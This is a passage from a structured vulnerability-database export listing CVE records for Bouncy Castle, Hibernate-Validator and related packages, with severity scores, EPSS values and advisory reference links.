value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://security.netapp.com/advisory/ntap-20171214-0003
33
reference_url https://web.archive.org/web/20200401000000*/http://www.securityfocus.com/bid/103880
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://web.archive.org/web/20200401000000*/http://www.securityfocus.com/bid/103880
34
reference_url https://web.archive.org/web/20201221192044/http://www.securitytracker.com/id/1039769
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://web.archive.org/web/20201221192044/http://www.securitytracker.com/id/1039769
35
reference_url https://www.debian.org/security/2017/dsa-4037
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://www.debian.org/security/2017/dsa-4037
36
reference_url https://www.oracle.com/security-alerts/cpuoct2020.html
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpuoct2020.html
37
reference_url https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html
38
reference_url https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
39
reference_url http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html
40
reference_url http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html
41
reference_url http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html
42
reference_url http://www.securityfocus.com/bid/103880
reference_id
reference_type
scores
url http://www.securityfocus.com/bid/103880
43
reference_url http://www.securitytracker.com/id/1039769
reference_id
reference_type
scores
url http://www.securitytracker.com/id/1039769
44
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1506612
reference_id 1506612
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1506612
45
reference_url https://nvd.nist.gov/vuln/detail/CVE-2017-15095
reference_id CVE-2017-15095
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2017-15095
46
reference_url https://github.com/advisories/GHSA-h592-38cm-4ggp
reference_id GHSA-h592-38cm-4ggp
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-h592-38cm-4ggp
47
reference_url https://usn.ubuntu.com/4741-1/
reference_id USN-4741-1
reference_type
scores
url https://usn.ubuntu.com/4741-1/
fixed_packages
aliases CVE-2017-15095, GHSA-h592-38cm-4ggp
risk_score 4.5
exploitability 0.5
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ceub-d4s9-dkcd
33
url VCID-crf9-zn1q-vya8
vulnerability_id VCID-crf9-zn1q-vya8
summary Bouncy Castle in Android before 5.1.1 LMY49F and 6.0 before 2016-01-01 allows attackers to obtain sensitive information via a crafted application, aka internal bug 24106146.
references
0
reference_url https://access.redhat.com/errata/RHSA-2017:1832
reference_id
reference_type
scores
url https://access.redhat.com/errata/RHSA-2017:1832
1
reference_url https://access.redhat.com/errata/RHSA-2017:2808
reference_id
reference_type
scores
url https://access.redhat.com/errata/RHSA-2017:2808
2
reference_url https://access.redhat.com/errata/RHSA-2017:2809
reference_id
reference_type
scores
url https://access.redhat.com/errata/RHSA-2017:2809
3
reference_url https://access.redhat.com/errata/RHSA-2017:2810
reference_id
reference_type
scores
url https://access.redhat.com/errata/RHSA-2017:2810
4
reference_url https://access.redhat.com/errata/RHSA-2017:2811
reference_id
reference_type
scores
url https://access.redhat.com/errata/RHSA-2017:2811
5
reference_url https://access.redhat.com/errata/RHSA-2018:2927
reference_id
reference_type
scores
url https://access.redhat.com/errata/RHSA-2018:2927
6
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2015-6644.json
reference_id
reference_type
scores
0
value 5.5
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2015-6644.json
7
reference_url https://api.first.org/data/v1/epss?cve=CVE-2015-6644
reference_id
reference_type
scores
0
value 0.00184
scoring_system epss
scoring_elements 0.39981
published_at 2026-04-01T12:55:00Z
1
value 0.00184
scoring_system epss
scoring_elements 0.40095
published_at 2026-04-13T12:55:00Z
2
value 0.00184
scoring_system epss
scoring_elements 0.40152
published_at 2026-04-11T12:55:00Z
3
value 0.00184
scoring_system epss
scoring_elements 0.40114
published_at 2026-04-12T12:55:00Z
4
value 0.00184
scoring_system epss
scoring_elements 0.40129
published_at 2026-04-08T12:55:00Z
5
value 0.00184
scoring_system epss
scoring_elements 0.40155
published_at 2026-04-04T12:55:00Z
6
value 0.00184
scoring_system epss
scoring_elements 0.40076
published_at 2026-04-07T12:55:00Z
7
value 0.00184
scoring_system epss
scoring_elements 0.40142
published_at 2026-04-09T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2015-6644
8
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6644
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6644
9
reference_url https://github.com/bcgit/bc-java/commit/25aca54734b861ef109ac4943c4a5f98c0c1b885
reference_id
reference_type
scores
url https://github.com/bcgit/bc-java/commit/25aca54734b861ef109ac4943c4a5f98c0c1b885
10
reference_url https://github.com/bcgit/bc-java/commit/2d80e6cc6f5b78e159dba3277414e3bfea511dea
reference_id
reference_type
scores
url https://github.com/bcgit/bc-java/commit/2d80e6cc6f5b78e159dba3277414e3bfea511dea
11
reference_url https://github.com/bcgit/bc-java/commit/874bab94a5baf426545948116cabe6f4ae338c20
reference_id
reference_type
scores
url https://github.com/bcgit/bc-java/commit/874bab94a5baf426545948116cabe6f4ae338c20
12
reference_url https://github.com/bcgit/bc-java/commit/9bc10bbaa9620d691c58e2b37f31f0d31ceea61f
reference_id
reference_type
scores
url https://github.com/bcgit/bc-java/commit/9bc10bbaa9620d691c58e2b37f31f0d31ceea61f
13
reference_url http://source.android.com/security/bulletin/2016-01-01.html
reference_id
reference_type
scores
url http://source.android.com/security/bulletin/2016-01-01.html
14
reference_url http://www.debian.org/security/2017/dsa-3829
reference_id
reference_type
scores
url http://www.debian.org/security/2017/dsa-3829
15
reference_url http://www.securityfocus.com/bid/79865
reference_id
reference_type
scores
url http://www.securityfocus.com/bid/79865
16
reference_url http://www.securitytracker.com/id/1034592
reference_id
reference_type
scores
url http://www.securitytracker.com/id/1034592
17
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1444015
reference_id 1444015
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1444015
18
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:google:android:4.4.4:*:*:*:*:*:*:*
reference_id cpe:2.3:o:google:android:4.4.4:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:google:android:4.4.4:*:*:*:*:*:*:*
19
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:google:android:5.0:*:*:*:*:*:*:*
reference_id cpe:2.3:o:google:android:5.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:google:android:5.0:*:*:*:*:*:*:*
20
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:google:android:5.0.1:*:*:*:*:*:*:*
reference_id cpe:2.3:o:google:android:5.0.1:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:google:android:5.0.1:*:*:*:*:*:*:*
21
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:google:android:5.0.2:*:*:*:*:*:*:*
reference_id cpe:2.3:o:google:android:5.0.2:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:google:android:5.0.2:*:*:*:*:*:*:*
22
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:google:android:5.1.0:*:*:*:*:*:*:*
reference_id cpe:2.3:o:google:android:5.1.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:google:android:5.1.0:*:*:*:*:*:*:*
23
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:google:android:5.1.1:*:*:*:*:*:*:*
reference_id cpe:2.3:o:google:android:5.1.1:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:google:android:5.1.1:*:*:*:*:*:*:*
24
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:google:android:6.0:*:*:*:*:*:*:*
reference_id cpe:2.3:o:google:android:6.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:google:android:6.0:*:*:*:*:*:*:*
25
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:google:android:6.0.1:*:*:*:*:*:*:*
reference_id cpe:2.3:o:google:android:6.0.1:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:google:android:6.0.1:*:*:*:*:*:*:*
26
reference_url https://nvd.nist.gov/vuln/detail/CVE-2015-6644
reference_id CVE-2015-6644
reference_type
scores
0
value 4.3
scoring_system cvssv2
scoring_elements AV:N/AC:M/Au:N/C:P/I:N/A:N
1
value 3.3
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N
url https://nvd.nist.gov/vuln/detail/CVE-2015-6644
27
reference_url https://usn.ubuntu.com/3727-1/
reference_id USN-3727-1
reference_type
scores
url https://usn.ubuntu.com/3727-1/
fixed_packages
aliases CVE-2015-6644
risk_score 2.5
exploitability 0.5
weighted_severity 5.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-crf9-zn1q-vya8
34
url VCID-d4z1-hdkt-r7g1
vulnerability_id VCID-d4z1-hdkt-r7g1
summary 
The SafeHtml annotation in Hibernate-Validator does not properly guard against XSS attacks
A vulnerability was found in Hibernate-Validator. The SafeHtml validator annotation fails to properly sanitize payloads consisting of potentially malicious code in HTML comments and instructions. This vulnerability can result in an XSS attack.
references
0
reference_url https://access.redhat.com/errata/RHSA-2020:0159
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2020:0159
1
reference_url https://access.redhat.com/errata/RHSA-2020:0160
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2020:0160
2
reference_url https://access.redhat.com/errata/RHSA-2020:0161
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2020:0161
3
reference_url https://access.redhat.com/errata/RHSA-2020:0164
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2020:0164
4
reference_url https://access.redhat.com/errata/RHSA-2020:0445
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2020:0445
5
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-10219.json
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-10219.json
6
reference_url https://api.first.org/data/v1/epss?cve=CVE-2019-10219
reference_id
reference_type
scores
0
value 0.01674
scoring_system epss
scoring_elements 0.82155
published_at 2026-04-11T12:55:00Z
1
value 0.01674
scoring_system epss
scoring_elements 0.82146
published_at 2026-04-12T12:55:00Z
2
value 0.01674
scoring_system epss
scoring_elements 0.8214
published_at 2026-04-13T12:55:00Z
3
value 0.01674
scoring_system epss
scoring_elements 0.82136
published_at 2026-04-09T12:55:00Z
4
value 0.01674
scoring_system epss
scoring_elements 0.82128
published_at 2026-04-08T12:55:00Z
5
value 0.01674
scoring_system epss
scoring_elements 0.82102
published_at 2026-04-07T12:55:00Z
6
value 0.01674
scoring_system epss
scoring_elements 0.82106
published_at 2026-04-04T12:55:00Z
7
value 0.01674
scoring_system epss
scoring_elements 0.82085
published_at 2026-04-02T12:55:00Z
8
value 0.01674
scoring_system epss
scoring_elements 0.82073
published_at 2026-04-01T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2019-10219
7
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10219
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10219
8
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10219
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10219
9
reference_url https://github.com/hibernate/hibernate-validator
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/hibernate/hibernate-validator
10
reference_url https://github.com/hibernate/hibernate-validator/commit/124b7dd6d9a4ad24d4d49f74701f05a13e56cee
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/hibernate/hibernate-validator/commit/124b7dd6d9a4ad24d4d49f74701f05a13e56cee
11
reference_url https://github.com/hibernate/hibernate-validator/commit/124b7dd6d9a4ad24d4d49f74701f05a13e56ceee
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/hibernate/hibernate-validator/commit/124b7dd6d9a4ad24d4d49f74701f05a13e56ceee
12
reference_url https://github.com/hibernate/hibernate-validator/commit/20d729548511ac5cff6fd459f93de137195420fe
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/hibernate/hibernate-validator/commit/20d729548511ac5cff6fd459f93de137195420fe
13
reference_url https://github.com/poc-effectiveness/PoCAdaptation/tree/main/Adapted/CVE-2019-10219
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/poc-effectiveness/PoCAdaptation/tree/main/Adapted/CVE-2019-10219
14
reference_url https://github.com/poc-effectiveness/PoCAdaptation/tree/main/Origin/CVE-2019-10219/exploit
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/poc-effectiveness/PoCAdaptation/tree/main/Origin/CVE-2019-10219/exploit
15
reference_url https://lists.apache.org/thread.html/r4f8b4e2541be4234946e40d55859273a7eec0f4901e8080ce2406fe6@%3Cnotifications.accumulo.apache.org%3E
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r4f8b4e2541be4234946e40d55859273a7eec0f4901e8080ce2406fe6@%3Cnotifications.accumulo.apache.org%3E
16
reference_url https://lists.apache.org/thread.html/r4f8b4e2541be4234946e40d55859273a7eec0f4901e8080ce2406fe6%40%3Cnotifications.accumulo.apache.org%3E
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r4f8b4e2541be4234946e40d55859273a7eec0f4901e8080ce2406fe6%40%3Cnotifications.accumulo.apache.org%3E
17
reference_url https://lists.apache.org/thread.html/r4f92d7f7682dcff92722fa947f9e6f8ba2227c5dc3e11ba09114897d@%3Cnotifications.accumulo.apache.org%3E
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r4f92d7f7682dcff92722fa947f9e6f8ba2227c5dc3e11ba09114897d@%3Cnotifications.accumulo.apache.org%3E
18
reference_url https://lists.apache.org/thread.html/r4f92d7f7682dcff92722fa947f9e6f8ba2227c5dc3e11ba09114897d%40%3Cnotifications.accumulo.apache.org%3E
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r4f92d7f7682dcff92722fa947f9e6f8ba2227c5dc3e11ba09114897d%40%3Cnotifications.accumulo.apache.org%3E
19
reference_url https://lists.apache.org/thread.html/r87b7e2d22982b4ca9f88f5f4f22a19b394d2662415b233582ed22ebf@%3Cnotifications.accumulo.apache.org%3E
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r87b7e2d22982b4ca9f88f5f4f22a19b394d2662415b233582ed22ebf@%3Cnotifications.accumulo.apache.org%3E
20
reference_url https://lists.apache.org/thread.html/r87b7e2d22982b4ca9f88f5f4f22a19b394d2662415b233582ed22ebf%40%3Cnotifications.accumulo.apache.org%3E
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r87b7e2d22982b4ca9f88f5f4f22a19b394d2662415b233582ed22ebf%40%3Cnotifications.accumulo.apache.org%3E
21
reference_url https://lists.apache.org/thread.html/rb8dca19a4e52b60dab0ab21e2ff9968d78f4b84e4033824db1dd24b4@%3Cpluto-scm.portals.apache.org%3E
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rb8dca19a4e52b60dab0ab21e2ff9968d78f4b84e4033824db1dd24b4@%3Cpluto-scm.portals.apache.org%3E
22
reference_url https://lists.apache.org/thread.html/rb8dca19a4e52b60dab0ab21e2ff9968d78f4b84e4033824db1dd24b4%40%3Cpluto-scm.portals.apache.org%3E
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rb8dca19a4e52b60dab0ab21e2ff9968d78f4b84e4033824db1dd24b4%40%3Cpluto-scm.portals.apache.org%3E
23
reference_url https://lists.apache.org/thread.html/rd418deda6f0ebe658c2015f43a14d03acb8b8c2c093c5bf6b880cd7c@%3Cpluto-dev.portals.apache.org%3E
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rd418deda6f0ebe658c2015f43a14d03acb8b8c2c093c5bf6b880cd7c@%3Cpluto-dev.portals.apache.org%3E
24
reference_url https://lists.apache.org/thread.html/rd418deda6f0ebe658c2015f43a14d03acb8b8c2c093c5bf6b880cd7c%40%3Cpluto-dev.portals.apache.org%3E
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rd418deda6f0ebe658c2015f43a14d03acb8b8c2c093c5bf6b880cd7c%40%3Cpluto-dev.portals.apache.org%3E
25
reference_url https://lists.apache.org/thread.html/rf9c17c3efc4a376a96e9e2777eee6acf0bec28e2200e4b35da62de4a@%3Cpluto-dev.portals.apache.org%3E
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rf9c17c3efc4a376a96e9e2777eee6acf0bec28e2200e4b35da62de4a@%3Cpluto-dev.portals.apache.org%3E
26
reference_url https://lists.apache.org/thread.html/rf9c17c3efc4a376a96e9e2777eee6acf0bec28e2200e4b35da62de4a%40%3Cpluto-dev.portals.apache.org%3E
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rf9c17c3efc4a376a96e9e2777eee6acf0bec28e2200e4b35da62de4a%40%3Cpluto-dev.portals.apache.org%3E
27
reference_url https://nvd.nist.gov/vuln/detail/CVE-2019-10219
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2019-10219
28
reference_url https://security.netapp.com/advisory/ntap-20220210-0024
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://security.netapp.com/advisory/ntap-20220210-0024
29
reference_url https://www.oracle.com/security-alerts/cpujan2022.html
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpujan2022.html
30
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1738673
reference_id 1738673
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1738673
31
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=948235
reference_id 948235
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=948235
32
reference_url https://github.com/advisories/GHSA-m8p2-495h-ccmh
reference_id GHSA-m8p2-495h-ccmh
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-m8p2-495h-ccmh
33
reference_url https://access.redhat.com/errata/RHSA-2020:2067
reference_id RHSA-2020:2067
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:2067
34
reference_url https://access.redhat.com/errata/RHSA-2020:2321
reference_id RHSA-2020:2321
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:2321
35
reference_url https://access.redhat.com/errata/RHSA-2020:4366
reference_id RHSA-2020:4366
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:4366
36
reference_url https://access.redhat.com/errata/RHSA-2020:5568
reference_id RHSA-2020:5568
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:5568
fixed_packages
aliases CVE-2019-10219, GHSA-m8p2-495h-ccmh
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-d4z1-hdkt-r7g1
35
url VCID-ddqw-aj7g-s7c2
vulnerability_id VCID-ddqw-aj7g-s7c2
summary In the Bouncy Castle JCE Provider version 1.55 and earlier DSA signature generation is vulnerable to timing attack. Where timings can be closely observed for the generation of signatures, the lack of blinding in 1.55, or earlier, may allow an attacker to gain information about the signature's k value and ultimately the private value as well.
references
0
reference_url https://access.redhat.com/errata/RHSA-2018:2669
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:2669
1
reference_url https://access.redhat.com/errata/RHSA-2018:2927
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:2927
2
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2016-1000341.json
reference_id
reference_type
scores
0
value 5.1
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2016-1000341.json
3
reference_url https://api.first.org/data/v1/epss?cve=CVE-2016-1000341
reference_id
reference_type
scores
0
value 0.00802
scoring_system epss
scoring_elements 0.74114
published_at 2026-04-11T12:55:00Z
1
value 0.00802
scoring_system epss
scoring_elements 0.74093
